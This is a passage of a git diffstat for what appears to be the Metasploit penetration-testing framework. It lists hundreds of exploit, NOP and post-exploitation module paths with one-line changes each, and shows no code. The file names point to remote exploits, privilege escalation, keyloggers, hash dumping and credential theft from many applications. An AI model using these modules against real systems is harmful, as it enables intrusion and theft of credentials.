.../exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb | 2 +- modules/exploits/windows/http/oracle_btm_writetofile.rb | 2 +- modules/exploits/windows/http/oracle_endeca_exec.rb | 2 +- modules/exploits/windows/http/oracle_event_processing_upload.rb | 2 +- modules/exploits/windows/http/osb_uname_jlist.rb | 2 +- modules/exploits/windows/http/peercast_url.rb | 2 +- modules/exploits/windows/http/php_apache_request_headers_bof.rb | 2 +- modules/exploits/windows/http/privatewire_gateway.rb | 2 +- modules/exploits/windows/http/psoproxy91_overflow.rb | 2 +- modules/exploits/windows/http/rabidhamster_r4_log.rb | 2 +- modules/exploits/windows/http/rejetto_hfs_exec.rb | 2 +- modules/exploits/windows/http/sambar6_search_results.rb | 2 +- modules/exploits/windows/http/sap_configservlet_exec_noauth.rb | 2 +- modules/exploits/windows/http/sap_host_control_cmd_exec.rb | 2 +- modules/exploits/windows/http/sapdb_webtools.rb | 2 +- modules/exploits/windows/http/savant_31_overflow.rb | 2 +- modules/exploits/windows/http/servu_session_cookie.rb | 2 +- modules/exploits/windows/http/shoutcast_format.rb | 2 +- modules/exploits/windows/http/shttpd_post.rb | 2 +- modules/exploits/windows/http/solarwinds_fsm_userlogin.rb | 2 +- modules/exploits/windows/http/solarwinds_storage_manager_sql.rb | 2 +- modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb | 2 +- modules/exploits/windows/http/steamcast_useragent.rb | 2 +- modules/exploits/windows/http/sws_connection_bof.rb | 2 +- modules/exploits/windows/http/sybase_easerver.rb | 2 +- modules/exploits/windows/http/sysax_create_folder.rb | 2 +- modules/exploits/windows/http/trackercam_phparg_overflow.rb | 2 +- modules/exploits/windows/http/trackit_file_upload.rb | 2 +- modules/exploits/windows/http/trendmicro_officescan.rb | 2 +- modules/exploits/windows/http/ultraminihttp_bof.rb | 2 +- modules/exploits/windows/http/umbraco_upload_aspx.rb | 2 +- .../exploits/windows/http/vmware_vcenter_chargeback_upload.rb | 2 +- modules/exploits/windows/http/webster_http.rb | 2 +- modules/exploits/windows/http/xampp_webdav_upload_php.rb | 2 +- modules/exploits/windows/http/xitami_if_mod_since.rb | 2 +- .../exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb | 2 +- modules/exploits/windows/http/zenworks_uploadservlet.rb | 2 +- modules/exploits/windows/iis/iis_webdav_upload_asp.rb | 2 +- modules/exploits/windows/iis/ms01_023_printer.rb | 2 +- modules/exploits/windows/iis/ms01_026_dbldecode.rb | 2 +- modules/exploits/windows/iis/ms01_033_idq.rb | 2 +- modules/exploits/windows/iis/ms02_018_htr.rb | 2 +- modules/exploits/windows/iis/ms02_065_msadc.rb | 2 +- modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb | 2 +- modules/exploits/windows/iis/msadc.rb | 2 +- modules/exploits/windows/imap/eudora_list.rb | 2 +- modules/exploits/windows/imap/imail_delete.rb | 2 +- modules/exploits/windows/imap/ipswitch_search.rb | 2 +- modules/exploits/windows/imap/mailenable_login.rb | 2 +- modules/exploits/windows/imap/mailenable_status.rb | 2 +- modules/exploits/windows/imap/mailenable_w3c_select.rb | 2 +- modules/exploits/windows/imap/mdaemon_cram_md5.rb | 2 +- modules/exploits/windows/imap/mdaemon_fetch.rb | 2 +- modules/exploits/windows/imap/mercur_imap_select_overflow.rb | 2 +- modules/exploits/windows/imap/mercur_login.rb | 2 +- modules/exploits/windows/imap/mercury_login.rb | 2 +- modules/exploits/windows/imap/mercury_rename.rb | 2 +- modules/exploits/windows/imap/novell_netmail_append.rb | 2 +- modules/exploits/windows/imap/novell_netmail_auth.rb | 2 +- modules/exploits/windows/imap/novell_netmail_status.rb | 2 +- modules/exploits/windows/imap/novell_netmail_subscribe.rb | 2 +- modules/exploits/windows/isapi/ms00_094_pbserver.rb | 2 +- modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb | 2 +- modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb | 2 +- modules/exploits/windows/isapi/rsa_webagent_redirect.rb | 2 +- modules/exploits/windows/isapi/w3who_query.rb | 2 +- modules/exploits/windows/ldap/imail_thc.rb | 2 +- modules/exploits/windows/ldap/pgp_keyserver7.rb | 2 +- modules/exploits/windows/license/calicclnt_getconfig.rb | 2 +- modules/exploits/windows/license/calicserv_getconfig.rb | 2 +- modules/exploits/windows/license/flexnet_lmgrd_bof.rb | 2 +- modules/exploits/windows/license/sentinel_lm7_udp.rb | 2 +- modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb | 2 +- modules/exploits/windows/local/agnitum_outpost_acs.rb | 2 +- modules/exploits/windows/local/always_install_elevated.rb | 2 +- modules/exploits/windows/local/ask.rb | 2 +- modules/exploits/windows/local/bthpan.rb | 2 +- modules/exploits/windows/local/bypassuac.rb | 2 +- modules/exploits/windows/local/bypassuac_injection.rb | 2 +- modules/exploits/windows/local/bypassuac_vbs.rb | 2 +- modules/exploits/windows/local/current_user_psexec.rb | 2 +- modules/exploits/windows/local/ikeext_service.rb | 2 +- modules/exploits/windows/local/ipass_launch_app.rb | 2 +- modules/exploits/windows/local/lenovo_systemupdate.rb | 2 +- modules/exploits/windows/local/mqac_write.rb | 2 +- modules/exploits/windows/local/ms10_015_kitrap0d.rb | 2 +- modules/exploits/windows/local/ms10_092_schelevator.rb | 2 +- modules/exploits/windows/local/ms11_080_afdjoinleaf.rb | 2 +- modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb | 2 +- modules/exploits/windows/local/ms13_053_schlamperei.rb | 2 +- modules/exploits/windows/local/ms13_081_track_popup_menu.rb | 2 +- modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb | 2 +- modules/exploits/windows/local/ms14_009_ie_dfsvc.rb | 2 +- modules/exploits/windows/local/ms14_058_track_popup_menu.rb | 2 +- modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb | 2 +- modules/exploits/windows/local/ms15_004_tswbproxy.rb | 2 +- modules/exploits/windows/local/ms15_051_client_copy_image.rb | 2 +- modules/exploits/windows/local/ms15_078_atmfd_bof.rb | 2 +- modules/exploits/windows/local/ms_ndproxy.rb | 2 +- modules/exploits/windows/local/novell_client_nicm.rb | 2 +- modules/exploits/windows/local/novell_client_nwfs.rb | 2 +- modules/exploits/windows/local/ntapphelpcachecontrol.rb | 2 +- modules/exploits/windows/local/nvidia_nvsvc.rb | 2 +- modules/exploits/windows/local/payload_inject.rb | 2 +- modules/exploits/windows/local/powershell_cmd_upgrade.rb | 2 +- modules/exploits/windows/local/powershell_remoting.rb | 2 +- modules/exploits/windows/local/ppr_flatten_rec.rb | 2 +- modules/exploits/windows/local/pxeexploit.rb | 2 +- modules/exploits/windows/local/run_as.rb | 2 +- modules/exploits/windows/local/s4u_persistence.rb | 2 +- modules/exploits/windows/local/service_permissions.rb | 2 +- modules/exploits/windows/local/trusted_service_path.rb | 2 +- modules/exploits/windows/local/virtual_box_guest_additions.rb | 2 +- modules/exploits/windows/local/virtual_box_opengl_escape.rb | 2 +- modules/exploits/windows/local/vss_persistence.rb | 2 +- modules/exploits/windows/local/wmi.rb | 2 +- modules/exploits/windows/lotus/domino_http_accept_language.rb | 2 +- modules/exploits/windows/lotus/domino_icalendar_organizer.rb | 2 +- modules/exploits/windows/lotus/domino_sametime_stmux.rb | 2 +- modules/exploits/windows/lotus/lotusnotes_lzh.rb | 2 +- modules/exploits/windows/lpd/hummingbird_exceed.rb | 2 +- modules/exploits/windows/lpd/niprint.rb | 2 +- modules/exploits/windows/lpd/saplpd.rb | 2 +- modules/exploits/windows/lpd/wincomlpd_admin.rb | 2 +- modules/exploits/windows/misc/achat_bof.rb | 2 +- modules/exploits/windows/misc/actfax_raw_server_bof.rb | 2 +- modules/exploits/windows/misc/agentxpp_receive_agentx.rb | 2 +- modules/exploits/windows/misc/allmediaserver_bof.rb | 2 +- modules/exploits/windows/misc/altiris_ds_sqli.rb | 2 +- modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb | 2 +- modules/exploits/windows/misc/asus_dpcproxy_overflow.rb | 2 +- modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb | 2 +- modules/exploits/windows/misc/avidphoneticindexer.rb | 2 +- modules/exploits/windows/misc/bakbone_netvault_heap.rb | 2 +- modules/exploits/windows/misc/bcaaa_bof.rb | 2 +- modules/exploits/windows/misc/bigant_server.rb | 2 +- modules/exploits/windows/misc/bigant_server_250.rb | 2 +- modules/exploits/windows/misc/bigant_server_dupf_upload.rb | 2 +- modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb | 2 +- modules/exploits/windows/misc/bigant_server_usv.rb | 2 +- modules/exploits/windows/misc/bomberclone_overflow.rb | 2 +- modules/exploits/windows/misc/bopup_comm.rb | 2 +- modules/exploits/windows/misc/borland_interbase.rb | 2 +- modules/exploits/windows/misc/borland_starteam.rb | 2 +- modules/exploits/windows/misc/citrix_streamprocess.rb | 2 +- modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb | 2 +- .../misc/citrix_streamprocess_get_boot_record_request.rb | 2 +- .../exploits/windows/misc/citrix_streamprocess_get_footer.rb | 2 +- .../exploits/windows/misc/citrix_streamprocess_get_objects.rb | 2 +- modules/exploits/windows/misc/doubletake.rb | 2 +- modules/exploits/windows/misc/eiqnetworks_esa.rb | 2 +- modules/exploits/windows/misc/eiqnetworks_esa_topology.rb | 2 +- modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb | 2 +- modules/exploits/windows/misc/eureka_mail_err.rb | 2 +- modules/exploits/windows/misc/fb_cnct_group.rb | 2 +- modules/exploits/windows/misc/fb_isc_attach_database.rb | 2 +- modules/exploits/windows/misc/fb_isc_create_database.rb | 2 +- modules/exploits/windows/misc/fb_svc_attach.rb | 2 +- modules/exploits/windows/misc/gimp_script_fu.rb | 2 +- modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb | 2 +- modules/exploits/windows/misc/hp_dataprotector_crs.rb | 2 +- modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb | 2 +- modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb | 2 +- modules/exploits/windows/misc/hp_dataprotector_new_folder.rb | 2 +- modules/exploits/windows/misc/hp_dataprotector_traversal.rb | 2 +- modules/exploits/windows/misc/hp_imc_uam.rb | 2 +- modules/exploits/windows/misc/hp_loadrunner_magentproc.rb | 2 +- modules/exploits/windows/misc/hp_magentservice.rb | 2 +- modules/exploits/windows/misc/hp_omniinet_1.rb | 2 +- modules/exploits/windows/misc/hp_omniinet_2.rb | 2 +- modules/exploits/windows/misc/hp_omniinet_3.rb | 2 +- modules/exploits/windows/misc/hp_omniinet_4.rb | 2 +- modules/exploits/windows/misc/hp_operations_agent_coda_34.rb | 2 +- modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb | 2 +- modules/exploits/windows/misc/hp_ovtrace.rb | 2 +- modules/exploits/windows/misc/ib_isc_attach_database.rb | 2 +- modules/exploits/windows/misc/ib_isc_create_database.rb | 2 +- modules/exploits/windows/misc/ib_svc_attach.rb | 2 +- modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb | 2 +- modules/exploits/windows/misc/ibm_director_cim_dllinject.rb | 2 +- modules/exploits/windows/misc/ibm_tsm_cad_ping.rb | 2 +- modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb | 2 +- modules/exploits/windows/misc/itunes_extm3u_bof.rb | 2 +- modules/exploits/windows/misc/landesk_aolnsrvr.rb | 2 +- modules/exploits/windows/misc/lianja_db_net.rb | 2 +- .../exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb | 2 +- modules/exploits/windows/misc/mercury_phonebook.rb | 2 +- modules/exploits/windows/misc/mini_stream.rb | 2 +- modules/exploits/windows/misc/mirc_privmsg_server.rb | 2 +- modules/exploits/windows/misc/ms07_064_sami.rb | 2 +- modules/exploits/windows/misc/ms10_104_sharepoint.rb | 2 +- modules/exploits/windows/misc/netcat110_nt.rb | 2 +- modules/exploits/windows/misc/nettransport.rb | 2 +- modules/exploits/windows/misc/nvidia_mental_ray.rb | 2 +- modules/exploits/windows/misc/poisonivy_bof.rb | 2 +- modules/exploits/windows/misc/poppeeper_date.rb | 2 +- modules/exploits/windows/misc/poppeeper_uidl.rb | 2 +- modules/exploits/windows/misc/realtek_playlist.rb | 2 +- modules/exploits/windows/misc/sap_2005_license.rb | 2 +- modules/exploits/windows/misc/sap_netweaver_dispatcher.rb | 2 +- modules/exploits/windows/misc/shixxnote_font.rb | 2 +- .../windows/misc/solidworks_workgroup_pdmwservice_file_write.rb | 2 +- modules/exploits/windows/misc/splayer_content_type.rb | 2 +- modules/exploits/windows/misc/stream_down_bof.rb | 2 +- modules/exploits/windows/misc/talkative_response.rb | 2 +- modules/exploits/windows/misc/tiny_identd_overflow.rb | 2 +- .../exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb | 2 +- modules/exploits/windows/misc/ufo_ai.rb | 2 +- modules/exploits/windows/misc/windows_rsh.rb | 2 +- modules/exploits/windows/misc/wireshark_lua.rb | 2 +- modules/exploits/windows/misc/wireshark_packet_dect.rb | 2 +- modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb | 2 +- modules/exploits/windows/motorola/timbuktu_fileupload.rb | 2 +- modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb | 2 +- modules/exploits/windows/mssql/ms02_039_slammer.rb | 2 +- modules/exploits/windows/mssql/ms02_056_hello.rb | 2 +- modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb | 2 +- .../windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb | 2 +- modules/exploits/windows/mssql/mssql_linkcrawler.rb | 2 +- modules/exploits/windows/mssql/mssql_payload.rb | 2 +- modules/exploits/windows/mssql/mssql_payload_sqli.rb | 2 +- modules/exploits/windows/mysql/mysql_mof.rb | 2 +- modules/exploits/windows/mysql/mysql_payload.rb | 2 +- modules/exploits/windows/mysql/mysql_start_up.rb | 2 +- modules/exploits/windows/mysql/mysql_yassl_hello.rb | 2 +- modules/exploits/windows/mysql/scrutinizer_upload_exec.rb | 2 +- modules/exploits/windows/nfs/xlink_nfsd.rb | 2 +- modules/exploits/windows/nntp/ms05_030_nntp.rb | 2 +- modules/exploits/windows/novell/file_reporter_fsfui_upload.rb | 2 +- modules/exploits/windows/novell/groupwisemessenger_client.rb | 2 +- modules/exploits/windows/novell/netiq_pum_eval.rb | 2 +- modules/exploits/windows/novell/nmap_stor.rb | 2 +- modules/exploits/windows/novell/zenworks_desktop_agent.rb | 2 +- modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb | 2 +- modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb | 2 +- modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb | 2 +- modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb | 2 +- .../exploits/windows/oracle/client_system_analyzer_upload.rb | 2 +- modules/exploits/windows/oracle/extjob.rb | 2 +- modules/exploits/windows/oracle/osb_ndmp_auth.rb | 2 +- modules/exploits/windows/oracle/tns_arguments.rb | 2 +- modules/exploits/windows/oracle/tns_auth_sesskey.rb | 2 +- modules/exploits/windows/oracle/tns_service_name.rb | 2 +- modules/exploits/windows/pop3/seattlelab_pass.rb | 2 +- modules/exploits/windows/postgres/postgres_payload.rb | 2 +- modules/exploits/windows/proxy/bluecoat_winproxy_host.rb | 2 +- modules/exploits/windows/proxy/ccproxy_telnet_ping.rb | 2 +- modules/exploits/windows/proxy/proxypro_http_get.rb | 2 +- modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb | 2 +- modules/exploits/windows/scada/abb_wserver_exec.rb | 2 +- modules/exploits/windows/scada/citect_scada_odbc.rb | 2 +- .../exploits/windows/scada/codesys_gateway_server_traversal.rb | 2 +- modules/exploits/windows/scada/codesys_web_server.rb | 2 +- modules/exploits/windows/scada/daq_factory_bof.rb | 2 +- modules/exploits/windows/scada/factorylink_csservice.rb | 2 +- modules/exploits/windows/scada/factorylink_vrn_09.rb | 2 +- modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb | 2 +- modules/exploits/windows/scada/iconics_genbroker.rb | 2 +- modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb | 2 +- modules/exploits/windows/scada/igss9_igssdataserver_listall.rb | 2 +- modules/exploits/windows/scada/igss9_igssdataserver_rename.rb | 2 +- modules/exploits/windows/scada/igss9_misc.rb | 2 +- modules/exploits/windows/scada/igss_exec_17.rb | 2 +- modules/exploits/windows/scada/indusoft_webstudio_exec.rb | 2 +- modules/exploits/windows/scada/moxa_mdmtool.rb | 2 +- modules/exploits/windows/scada/procyon_core_server.rb | 2 +- modules/exploits/windows/scada/realwin.rb | 2 +- modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb | 2 +- modules/exploits/windows/scada/realwin_on_fcs_login.rb | 2 +- modules/exploits/windows/scada/realwin_scpc_initialize.rb | 2 +- modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb | 2 +- modules/exploits/windows/scada/realwin_scpc_txtevent.rb | 2 +- modules/exploits/windows/scada/scadapro_cmdexe.rb | 2 +- modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb | 2 +- modules/exploits/windows/scada/winlog_runtime.rb | 2 +- modules/exploits/windows/scada/winlog_runtime_2.rb | 2 +- modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb | 2 +- modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb | 2 +- modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb | 2 +- modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb | 2 +- modules/exploits/windows/sip/aim_triton_cseq.rb | 2 +- modules/exploits/windows/sip/sipxezphone_cseq.rb | 2 +- modules/exploits/windows/sip/sipxphone_cseq.rb | 2 +- modules/exploits/windows/smb/generic_smb_dll_injection.rb | 2 +- modules/exploits/windows/smb/group_policy_startup.rb | 2 +- modules/exploits/windows/smb/ipass_pipe_exec.rb | 2 +- modules/exploits/windows/smb/ms03_049_netapi.rb | 2 +- modules/exploits/windows/smb/ms04_007_killbill.rb | 2 +- modules/exploits/windows/smb/ms04_011_lsass.rb | 2 +- modules/exploits/windows/smb/ms04_031_netdde.rb | 2 +- modules/exploits/windows/smb/ms05_039_pnp.rb | 2 +- modules/exploits/windows/smb/ms06_025_rasmans_reg.rb | 2 +- modules/exploits/windows/smb/ms06_025_rras.rb | 2 +- modules/exploits/windows/smb/ms06_040_netapi.rb | 2 +- modules/exploits/windows/smb/ms06_066_nwapi.rb | 2 +- modules/exploits/windows/smb/ms06_066_nwwks.rb | 2 +- modules/exploits/windows/smb/ms06_070_wkssvc.rb | 2 +- modules/exploits/windows/smb/ms07_029_msdns_zonename.rb | 2 +- modules/exploits/windows/smb/ms08_067_netapi.rb | 2 +- .../exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb | 2 +- .../exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb | 2 +- modules/exploits/windows/smb/ms10_061_spoolss.rb | 2 +- .../exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb | 2 +- modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb | 2 +- modules/exploits/windows/smb/psexec.rb | 2 +- modules/exploits/windows/smb/psexec_psh.rb | 2 +- modules/exploits/windows/smb/smb_relay.rb | 2 +- modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb | 2 +- modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb | 2 +- modules/exploits/windows/smtp/mercury_cram_md5.rb | 2 +- modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb | 2 +- modules/exploits/windows/smtp/njstar_smtp_bof.rb | 2 +- modules/exploits/windows/smtp/wmailserver.rb | 2 +- modules/exploits/windows/smtp/ypops_overflow1.rb | 2 +- modules/exploits/windows/ssh/freeftpd_key_exchange.rb | 2 +- modules/exploits/windows/ssh/freesshd_authbypass.rb | 2 +- modules/exploits/windows/ssh/freesshd_key_exchange.rb | 2 +- modules/exploits/windows/ssh/putty_msg_debug.rb | 2 +- modules/exploits/windows/ssh/securecrt_ssh1.rb | 2 +- modules/exploits/windows/ssh/sysax_ssh_username.rb | 2 +- modules/exploits/windows/ssl/ms04_011_pct.rb | 2 +- modules/exploits/windows/telnet/gamsoft_telsrv_username.rb | 2 +- modules/exploits/windows/telnet/goodtech_telnet.rb | 2 +- modules/exploits/windows/tftp/attftp_long_filename.rb | 2 +- modules/exploits/windows/tftp/distinct_tftp_traversal.rb | 2 +- modules/exploits/windows/tftp/dlink_long_filename.rb | 2 +- modules/exploits/windows/tftp/futuresoft_transfermode.rb | 2 +- modules/exploits/windows/tftp/netdecision_tftp_traversal.rb | 2 +- modules/exploits/windows/tftp/opentftp_error_code.rb | 2 +- modules/exploits/windows/tftp/quick_tftp_pro_mode.rb | 2 +- modules/exploits/windows/tftp/tftpd32_long_filename.rb | 2 +- modules/exploits/windows/tftp/tftpdwin_long_filename.rb | 2 +- modules/exploits/windows/tftp/tftpserver_wrq_bof.rb | 2 +- modules/exploits/windows/tftp/threectftpsvc_long_mode.rb | 2 +- modules/exploits/windows/unicenter/cam_log_security.rb | 2 +- modules/exploits/windows/vnc/realvnc_client.rb | 2 +- modules/exploits/windows/vnc/ultravnc_client.rb | 2 +- modules/exploits/windows/vnc/ultravnc_viewer_bof.rb | 2 +- modules/exploits/windows/vnc/winvnc_http_get.rb | 2 +- modules/exploits/windows/vpn/safenet_ike_11.rb | 2 +- modules/exploits/windows/winrm/winrm_script_exec.rb | 2 +- modules/exploits/windows/wins/ms04_045_wins.rb | 2 +- modules/nops/armle/simple.rb | 2 +- modules/nops/php/generic.rb | 2 +- modules/nops/ppc/simple.rb | 2 +- modules/nops/sparc/random.rb | 2 +- modules/nops/tty/generic.rb | 2 +- modules/nops/x64/simple.rb | 2 +- modules/nops/x86/opty2.rb | 2 +- modules/nops/x86/single_byte.rb | 2 +- modules/post/aix/hashdump.rb | 2 +- modules/post/cisco/gather/enum_cisco.rb | 2 +- modules/post/firefox/gather/cookies.rb | 2 +- modules/post/firefox/gather/history.rb | 2 +- modules/post/firefox/gather/passwords.rb | 2 +- modules/post/firefox/gather/xss.rb | 2 +- modules/post/firefox/manage/webcam_chat.rb | 2 +- modules/post/linux/busybox/enum_connections.rb | 2 +- modules/post/linux/busybox/enum_hosts.rb | 2 +- modules/post/linux/busybox/jailbreak.rb | 2 +- modules/post/linux/busybox/ping_net.rb | 2 +- modules/post/linux/busybox/set_dmz.rb | 2 +- modules/post/linux/busybox/set_dns.rb | 2 +- modules/post/linux/busybox/smb_share_root.rb | 2 +- modules/post/linux/busybox/wget_exec.rb | 2 +- modules/post/linux/gather/checkvm.rb | 2 +- modules/post/linux/gather/ecryptfs_creds.rb | 2 +- modules/post/linux/gather/enum_configs.rb | 2 +- modules/post/linux/gather/enum_network.rb | 2 +- modules/post/linux/gather/enum_protections.rb | 2 +- modules/post/linux/gather/enum_psk.rb | 2 +- modules/post/linux/gather/enum_system.rb | 2 +- modules/post/linux/gather/enum_users_history.rb | 2 +- modules/post/linux/gather/enum_xchat.rb | 2 +- modules/post/linux/gather/gnome_commander_creds.rb | 2 +- modules/post/linux/gather/hashdump.rb | 2 +- modules/post/linux/gather/mount_cifs_creds.rb | 2 +- modules/post/linux/gather/pptpd_chap_secrets.rb | 2 +- modules/post/linux/manage/download_exec.rb | 2 +- modules/post/multi/escalate/cups_root_file_read.rb | 2 +- modules/post/multi/escalate/metasploit_pcaplog.rb | 2 +- modules/post/multi/gather/apple_ios_backup.rb | 2 +- modules/post/multi/gather/check_malware.rb | 2 +- modules/post/multi/gather/dbvis_enum.rb | 2 +- modules/post/multi/gather/dns_bruteforce.rb | 2 +- modules/post/multi/gather/dns_reverse_lookup.rb | 2 +- modules/post/multi/gather/dns_srv_lookup.rb | 2 +- modules/post/multi/gather/enum_vbox.rb | 2 +- modules/post/multi/gather/env.rb | 2 +- modules/post/multi/gather/fetchmailrc_creds.rb | 2 +- modules/post/multi/gather/filezilla_client_cred.rb | 2 +- modules/post/multi/gather/find_vmx.rb | 2 +- modules/post/multi/gather/firefox_creds.rb | 2 +- modules/post/multi/gather/gpg_creds.rb | 2 +- modules/post/multi/gather/lastpass_creds.rb | 2 +- modules/post/multi/gather/multi_command.rb | 2 +- modules/post/multi/gather/netrc_creds.rb | 2 +- modules/post/multi/gather/pgpass_creds.rb | 2 +- modules/post/multi/gather/pidgin_cred.rb | 2 +- modules/post/multi/gather/ping_sweep.rb | 2 +- modules/post/multi/gather/remmina_creds.rb | 2 +- modules/post/multi/gather/resolve_hosts.rb | 2 +- modules/post/multi/gather/rsyncd_creds.rb | 2 +- modules/post/multi/gather/run_console_rc_file.rb | 2 +- modules/post/multi/gather/skype_enum.rb | 2 +- modules/post/multi/gather/ssh_creds.rb | 2 +- modules/post/multi/gather/thunderbird_creds.rb | 2 +- modules/post/multi/gather/wlan_geolocate.rb | 2 +- modules/post/multi/general/close.rb | 2 +- modules/post/multi/general/execute.rb | 2 +- modules/post/multi/general/wall.rb | 2 +- modules/post/multi/manage/dbvis_add_db_admin.rb | 2 +- modules/post/multi/manage/dbvis_query.rb | 2 +- modules/post/multi/manage/multi_post.rb | 2 +- modules/post/multi/manage/play_youtube.rb | 2 +- modules/post/multi/manage/record_mic.rb | 2 +- modules/post/multi/manage/set_wallpaper.rb | 2 +- modules/post/multi/manage/shell_to_meterpreter.rb | 2 +- modules/post/multi/manage/sudo.rb | 2 +- modules/post/multi/manage/system_session.rb | 2 +- modules/post/multi/recon/local_exploit_suggester.rb | 2 +- modules/post/osx/admin/say.rb | 2 +- modules/post/osx/capture/keylog_recorder.rb | 2 +- modules/post/osx/capture/screen.rb | 2 +- modules/post/osx/gather/autologin_password.rb | 2 +- modules/post/osx/gather/enum_adium.rb | 2 +- modules/post/osx/gather/enum_airport.rb | 2 +- modules/post/osx/gather/enum_chicken_vnc_profile.rb | 2 +- modules/post/osx/gather/enum_colloquy.rb | 2 +- modules/post/osx/gather/enum_keychain.rb | 2 +- modules/post/osx/gather/enum_osx.rb | 2 +- modules/post/osx/gather/hashdump.rb | 2 +- modules/post/osx/gather/password_prompt_spoof.rb | 2 +- modules/post/osx/gather/safari_lastsession.rb | 2 +- modules/post/osx/manage/mount_share.rb | 2 +- modules/post/osx/manage/record_mic.rb | 2 +- modules/post/osx/manage/vpn.rb | 2 +- modules/post/osx/manage/webcam.rb | 2 +- modules/post/solaris/gather/checkvm.rb | 2 +- modules/post/solaris/gather/enum_packages.rb | 2 +- modules/post/solaris/gather/enum_services.rb | 2 +- modules/post/solaris/gather/hashdump.rb | 2 +- modules/post/windows/capture/keylog_recorder.rb | 2 +- modules/post/windows/capture/lockout_keylogger.rb | 2 +- modules/post/windows/escalate/droplnk.rb | 2 +- modules/post/windows/escalate/getsystem.rb | 2 +- modules/post/windows/escalate/golden_ticket.rb | 2 +- modules/post/windows/escalate/ms10_073_kbdlayout.rb | 2 +- modules/post/windows/escalate/screen_unlock.rb | 2 +- modules/post/windows/gather/arp_scanner.rb | 2 +- modules/post/windows/gather/bitcoin_jacker.rb | 2 +- modules/post/windows/gather/bitlocker_fvek.rb | 2 +- modules/post/windows/gather/cachedump.rb | 2 +- modules/post/windows/gather/checkvm.rb | 2 +- modules/post/windows/gather/credentials/bulletproof_ftp.rb | 2 +- modules/post/windows/gather/credentials/coreftp.rb | 2 +- modules/post/windows/gather/credentials/credential_collector.rb | 2 +- modules/post/windows/gather/credentials/domain_hashdump.rb | 2 +- modules/post/windows/gather/credentials/dyndns.rb | 2 +- modules/post/windows/gather/credentials/enum_cred_store.rb | 2 +- modules/post/windows/gather/credentials/enum_laps.rb | 2 +- modules/post/windows/gather/credentials/enum_picasa_pwds.rb | 2 +- modules/post/windows/gather/credentials/epo_sql.rb | 2 +- modules/post/windows/gather/credentials/filezilla_server.rb | 2 +- modules/post/windows/gather/credentials/flashfxp.rb | 2 +- modules/post/windows/gather/credentials/ftpnavigator.rb | 2 +- modules/post/windows/gather/credentials/ftpx.rb | 2 +- modules/post/windows/gather/credentials/gpp.rb | 2 +- modules/post/windows/gather/credentials/idm.rb | 2 +- modules/post/windows/gather/credentials/imail.rb | 2 +- modules/post/windows/gather/credentials/imvu.rb | 2 +- modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb | 2 +- modules/post/windows/gather/credentials/meebo.rb | 2 +- modules/post/windows/gather/credentials/mremote.rb | 2 +- modules/post/windows/gather/credentials/mssql_local_hashdump.rb | 2 +- modules/post/windows/gather/credentials/nimbuzz.rb | 2 +- modules/post/windows/gather/credentials/outlook.rb | 2 +- modules/post/windows/gather/credentials/razer_synapse.rb | 2 +- modules/post/windows/gather/credentials/razorsql.rb | 2 +- modules/post/windows/gather/credentials/rdc_manager_creds.rb | 2 +- modules/post/windows/gather/credentials/skype.rb | 2 +- modules/post/windows/gather/credentials/smartermail.rb | 2 +- modules/post/windows/gather/credentials/smartftp.rb | 2 +- modules/post/windows/gather/credentials/spark_im.rb | 2 +- modules/post/windows/gather/credentials/sso.rb | 2 +- modules/post/windows/gather/credentials/steam.rb | 2 +- modules/post/windows/gather/credentials/tortoisesvn.rb | 2 +- modules/post/windows/gather/credentials/total_commander.rb | 2 +- modules/post/windows/gather/credentials/trillian.rb | 2 +- modules/post/windows/gather/credentials/vnc.rb | 2 +- modules/post/windows/gather/credentials/windows_autologin.rb | 2 +- modules/post/windows/gather/credentials/winscp.rb | 2 +- modules/post/windows/gather/credentials/wsftp_client.rb | 2 +- modules/post/windows/gather/dnscache_dump.rb | 2 +- modules/post/windows/gather/dumplinks.rb | 2 +- modules/post/windows/gather/enum_ad_bitlocker.rb | 2 +- modules/post/windows/gather/enum_ad_computers.rb | 2 +- 